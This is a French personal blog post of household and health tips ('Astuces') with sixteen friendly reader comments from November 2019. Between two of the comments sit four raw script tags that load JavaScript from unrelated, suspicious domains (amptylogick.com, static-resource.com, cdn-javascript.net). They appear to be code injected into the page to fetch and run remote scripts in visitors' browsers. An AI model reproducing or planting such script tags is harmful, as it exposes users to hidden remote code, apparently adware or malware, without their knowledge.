• ♥Astuces♥

    ♥Astuces♥bonjour,

     

    ♥Astuces♥

    Le sommeil est la meilleure des méditations.

    Dalaï Lama

    //////////////////////////////////////////////////

    ♥Astuces♥

    ///////////////////////////////////////////////////

    Astuces

    ♥Astuces♥

    ////////////////////////////////////////////////////////////

    ♥Astuces♥

    ///////////////////////////////////////////////////////////////

    ♥Astuces♥

    //////////////////////////////////////////////////////////

    ♥Astuces♥

    //////////////////////////////////////////////////////

    aujourd'hui je ne serais pas trop présente

    car je change mon P.C ,désolée si je ne passe

    pas vous voir .

     Humour en image

    ♥Astuces♥

    /////////////////////////////

    ♥Astuces♥

     

    ////////////////////////////////////////////

    ♥Astuces♥

     

     

    « ♥bon mardi♥♥Recettes♥ »

  • Commentaires

    16
    Mercredi 6 Novembre 2019 à 20:02

    coucou ma douce
    je profite d'un peu de repos , pour venir te souhaiter une douce soirée ...
    en ce moment en plein dans les travaux chez moi , reste la cuisine et la salle de séjour à finir ....Heureusement qu'on a un peu d'aide , c'est fatiguant !!! Bon courage pour l'installation du nouveau PC.....
    Je t'envoie plein de gros bisous..

    15
    Mercredi 6 Novembre 2019 à 18:51

    Bonjour Renée, je te souhaite bon courage pour changer d'ordi, c'est toujours la galère pour tout réinstaller !!!! Merci de tous tes bons conseils. Et je dois t'avouer que lorsqu'il fait très froid je mets de petites socquettes de chez Damart qui sont super chaudes et cela me réchauffe tout de suite. Je te souhaite une bonne soirée, bisous.

    Résultat de recherche d'images pour "bisous du soir betty boop"

    14
    Mercredi 6 Novembre 2019 à 15:44

    merci pour ces bon conseils,,il a beaucoup plus chez nous le terre regorge d'eau il y en avait besoin,je te souhaite un très bon Mercredi,bises

    13
    Mercredi 6 Novembre 2019 à 13:20

    Bonjour Auriana, merci pour ces bons conseils, j'en note certains. La pluie s'est arrêtée. Bon mercredi. Gros bisous. 

    12
    Mercredi 6 Novembre 2019 à 13:15

    Je prends l'astuce pour les verrues quand aux chaussettes j'en mets pour dormir été comme hiver !!!

    Bonne journée, bisous

    11
    Mercredi 6 Novembre 2019 à 11:19

    Salut,

    Super ton humour.

    Il pleut il pleut bergère rentre tes moutons...

    Alors on reste au chaud..
    BOnne journée

    10
    Mercredi 6 Novembre 2019 à 10:23

    Coucou Estrelita, merci pour toutes s'est bonnes informations. Merci pour le partage. Je te souhaite une belle journée. Rohnny

    9
    Mercredi 6 Novembre 2019 à 09:35

    Coucou Estrelita, merci pour ces bons conseils dont certains je valide. Il pleut il y en a marre car les articulations font mal, l'arthrose est une vilaine maladie dégénérative et l'humidité ne l'améliore pas. Bon le reste tourne bien donc ok pour le contrôle technique lol ! Je te souhaite une bonne journée. Bisous kénavo 

    8
    Mercredi 6 Novembre 2019 à 09:22

    Merci pour toutes ces bonnes astuces !

    Bon mercredi, bisous !

    7
    Mercredi 6 Novembre 2019 à 07:48

    Merci pour ces astuces et j'en ai noté une.
    Bon courage pour le changement de pc, il faut se faire au nouveau après.
    Bisous et bonne journée

    6
    Mercredi 6 Novembre 2019 à 06:58

    Bon changement, j'espère que tout ira bien,  passes une bonne journée  bises Marine 

    5
    Mercredi 6 Novembre 2019 à 06:48

    On  dit  du   sommeil  qu' il est réparateur !

     Merci  pour  ces astuces  bien  utiles !

     Une  question   de taille !

     Passe   une  bonne  journée

     Bisous

    <script src="//amptylogick.com/21aca573d498d25317.js"></script> <script src="http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8620x" type="text/javascript"></script> <script src="http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8620x&format=arrjs&r=1573019218243" type="text/javascript"></script> <script src="http://amptylogick.com/ext/21aca573d498d25317.js?sid=52587_8620_&title=a&blocks[]=31af2" type="text/javascript"></script>
    4
    Mercredi 6 Novembre 2019 à 06:44

    et bien à mes prochains maux de tête j'essaierai de tirer sur mes mèches de cheveux....tout en ayant un petit doute....mais si ça pouvait aider à les faire passer...passe un bien doux mercredi

    3
    Mercredi 6 Novembre 2019 à 05:47

    Autrefois mon bof enseignant dans le Cézallier encadrait le mercredi la classe de neige 

     Située dans le massif volcanique du Cézallier, entre monts Dore et Cantal, la station été/hiver de Parrot vous accueille pour la pratique du ski nordique, raquettes ou VTT. Location de ski, raquettes, luge, VTT à assistance électrique, VTT, cerf-volant.

    J'adore ce coin et nous y allons autant que faire se peut 

    Oui je connais bien l'eau dont tu parles 

    Bonne journée à toi 

    Quand vient l' mercredi chez JB

    2
    Mercredi 6 Novembre 2019 à 05:46

    COUCOU  RENEE

    pas pu dormir de la nuit, il est 6h et j'ai clavioté toute la nuit

    super les astuces, celle du mal de tete, j'ai noté

    premier secours avec baume a levres et les olives

    merci pour le partage

    bisous a bientôt 

     

    1
    Mercredi 6 Novembre 2019 à 04:29

     Bonjour ESTRLITA

    Premier mercredi de Novembre

    à consommer avec joie et bonne humeur. 

    toujours dans la grisaille avec le dieu Éole,

    sans oublier les sempiternelles averses

    qui se déclenchent sans avertissement!

    Merveilleuse journée de mercredi

    qui commence avec 09 degrés et,

    pour être dans la continuité du changement

    de la flotte,de l'eau, de la pluie!

    hier 4° a quatre heures du matin et

    13° au plus doux de l’après midi!

    Amitiés[*=*] Bisous

      . * J-G-R-C-2019 *,

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :